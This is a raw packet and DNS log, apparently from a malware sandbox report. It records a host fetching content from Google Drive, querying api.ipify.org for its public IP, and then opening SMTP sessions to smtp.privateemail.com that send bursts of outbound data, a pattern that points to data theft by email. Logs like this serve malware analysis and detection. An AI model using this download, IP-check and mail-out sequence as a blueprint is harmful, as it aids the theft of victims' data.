                                                                                Apr 23, 2024 08:05:33.781965971 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.781975985 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.782001972 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.784008980 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.784054995 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.784081936 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.784116983 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.786088943 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.786135912 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.786142111 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.786169052 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.788137913 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.788178921 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.788300991 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.788336992 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.790132046 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.790179968 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.790194988 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.790230036 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.792218924 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.792268038 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.792283058 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.792318106 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.794174910 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.794219971 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.794323921 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.794358969 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.796112061 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.796161890 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.796169043 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.796200037 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.796205044 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.796241999 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.798068047 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.798124075 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.798130035 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.798187971 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.799998999 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.800044060 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.800061941 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.800107002 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.801918030 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.801970005 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.802840948 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.802896023 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.802903891 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.802942991 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.805000067 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.805047989 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.805061102 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.805109024 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.806598902 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.806646109 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.806672096 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.806708097 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.808576107 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.808624029 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.808821917 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.808859110 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.810311079 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.810353041 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.810421944 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.810456991 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.812171936 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.812216997 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.812314987 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.812352896 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.813985109 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.814033031 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.814038992 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.814097881 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.815712929 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.815759897 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.815813065 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.815846920 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.817529917 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.817569017 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.817619085 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.817657948 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.819382906 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.819421053 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.819433928 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.819468975 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.819473982 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.819499969 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.821007013 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.821043968 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.821050882 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.821079016 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.822706938 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.822745085 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.822784901 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.822820902 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.824307919 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.824345112 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.825139999 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.825180054 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.825186014 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.825222015 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.826808929 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.826853991 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.826864004 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.826920986 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.828476906 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.828514099 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.828520060 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.828561068 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.830215931 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.830260038 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.830265045 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.830298901 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.831763029 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.831800938 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.831805944 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.831846952 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.833399057 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.833437920 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.833444118 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.833475113 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.835011005 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.835057020 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.835062981 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.835092068 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.836600065 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.836644888 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.836651087 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.836700916 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.838195086 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.838241100 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.838246107 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.838305950 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.839792013 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.839835882 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.839840889 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.839893103 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.841365099 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.841408968 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.841414928 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.841469049 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.842973948 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.843017101 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.843022108 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.843076944 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.844544888 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.844585896 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.845252991 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.845292091 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.845299006 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.845345974 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.846718073 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.846756935 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.846761942 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.846795082 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.848076105 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.848118067 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.848159075 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.848196983 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.849512100 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.849551916 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.849558115 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.849590063 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.850826979 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.850866079 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.850871086 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.850902081 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.852211952 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.852248907 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.852253914 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.852293968 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.853507042 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.853542089 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.853547096 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.853589058 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.854903936 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.854943991 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.854980946 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.855019093 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.856112957 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.856152058 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.856157064 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.856188059 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.856190920 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.856209040 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:33.856215000 CEST44349715142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:05:33.856226921 CEST49715443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:05:38.299374104 CEST49716443192.168.2.5104.26.13.205
                                                                                Apr 23, 2024 08:05:38.299474001 CEST44349716104.26.13.205192.168.2.5
                                                                                Apr 23, 2024 08:05:38.299556017 CEST49716443192.168.2.5104.26.13.205
                                                                                Apr 23, 2024 08:05:38.301337957 CEST49716443192.168.2.5104.26.13.205
                                                                                Apr 23, 2024 08:05:38.301372051 CEST44349716104.26.13.205192.168.2.5
                                                                                Apr 23, 2024 08:05:38.487746954 CEST44349716104.26.13.205192.168.2.5
                                                                                Apr 23, 2024 08:05:38.487828970 CEST49716443192.168.2.5104.26.13.205
                                                                                Apr 23, 2024 08:05:38.491328001 CEST49716443192.168.2.5104.26.13.205
                                                                                Apr 23, 2024 08:05:38.491349936 CEST44349716104.26.13.205192.168.2.5
                                                                                Apr 23, 2024 08:05:38.491628885 CEST44349716104.26.13.205192.168.2.5
                                                                                Apr 23, 2024 08:05:38.495358944 CEST49716443192.168.2.5104.26.13.205
                                                                                Apr 23, 2024 08:05:38.536127090 CEST44349716104.26.13.205192.168.2.5
                                                                                Apr 23, 2024 08:05:38.764456987 CEST44349716104.26.13.205192.168.2.5
                                                                                Apr 23, 2024 08:05:38.764525890 CEST44349716104.26.13.205192.168.2.5
                                                                                Apr 23, 2024 08:05:38.764579058 CEST49716443192.168.2.5104.26.13.205
                                                                                Apr 23, 2024 08:05:38.775238991 CEST49716443192.168.2.5104.26.13.205
                                                                                Apr 23, 2024 08:05:40.809195995 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:40.957343102 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:40.957514048 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:41.106796026 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.109792948 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:41.257061958 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.257242918 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.257411003 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:41.404829025 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.405440092 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:41.552947044 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.554342985 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.554363012 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.554384947 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.554413080 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:41.554488897 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.554502010 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.554542065 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:41.588347912 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:41.735688925 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.736718893 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:41.781757116 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:41.910734892 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:42.058118105 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.058388948 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.058805943 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:42.206494093 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.207983971 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.208529949 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:42.355859995 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.358509064 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.359297991 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:42.506863117 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.509295940 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.509711027 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:42.657162905 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.687143087 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.688544989 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:42.835841894 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.836143017 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.836838961 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:42.836911917 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:42.836966991 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:42.836966991 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:42.984086037 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:42.984572887 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:43.130222082 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:43.172374964 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:43.409162998 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:43.556545973 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:43.556993008 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:43.557008028 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:43.557106018 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:43.559029102 CEST49717587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:43.560108900 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:43.706258059 CEST5874971766.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:43.707834959 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:43.707923889 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:43.856537104 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:43.856699944 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:44.004374981 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.004396915 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.004558086 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:44.151839972 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.152246952 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:44.299551010 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.299629927 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.302206993 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:44.305531025 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:44.450412989 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.450433969 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.453507900 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.453599930 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.455466032 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:44.603245974 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.604770899 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.605034113 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:44.753034115 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.756786108 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.757719040 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:44.904896975 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.906316996 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:44.906513929 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.053772926 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.076246023 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.078537941 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.227560997 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.227823973 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.228456020 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.228508949 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.228552103 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.228581905 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.228626966 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.228662968 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.228691101 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.228719950 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.228740931 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.228765011 CEST49718587192.168.2.566.29.159.53
                                                                                Apr 23, 2024 08:05:45.375551939 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.375593901 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.375686884 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.375812054 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.375958920 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.376430988 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.530365944 CEST5874971866.29.159.53192.168.2.5
                                                                                Apr 23, 2024 08:05:45.578613997 CEST49718587192.168.2.566.29.159.53

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 23, 2024 08:04:55.157747030 CEST6452953192.168.2.51.1.1.1
                                                                                Apr 23, 2024 08:04:55.246177912 CEST53645291.1.1.1192.168.2.5
                                                                                Apr 23, 2024 08:04:55.664405107 CEST6128253192.168.2.51.1.1.1
                                                                                Apr 23, 2024 08:04:55.752640963 CEST53612821.1.1.1192.168.2.5
                                                                                Apr 23, 2024 08:05:38.196286917 CEST6474153192.168.2.51.1.1.1
                                                                                Apr 23, 2024 08:05:38.285391092 CEST53647411.1.1.1192.168.2.5
                                                                                Apr 23, 2024 08:05:40.713316917 CEST6278153192.168.2.51.1.1.1
                                                                                Apr 23, 2024 08:05:40.802134037 CEST53627811.1.1.1192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Apr 23, 2024 08:04:55.157747030 CEST192.168.2.51.1.1.10xaae9Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                Apr 23, 2024 08:04:55.664405107 CEST192.168.2.51.1.1.10x5f9eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                Apr 23, 2024 08:05:38.196286917 CEST192.168.2.51.1.1.10x898eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                Apr 23, 2024 08:05:40.713316917 CEST192.168.2.51.1.1.10x9c9bStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Apr 23, 2024 08:04:55.246177912 CEST1.1.1.1192.168.2.50xaae9No error (0)drive.google.com142.250.81.238A (IP address)IN (0x0001)false
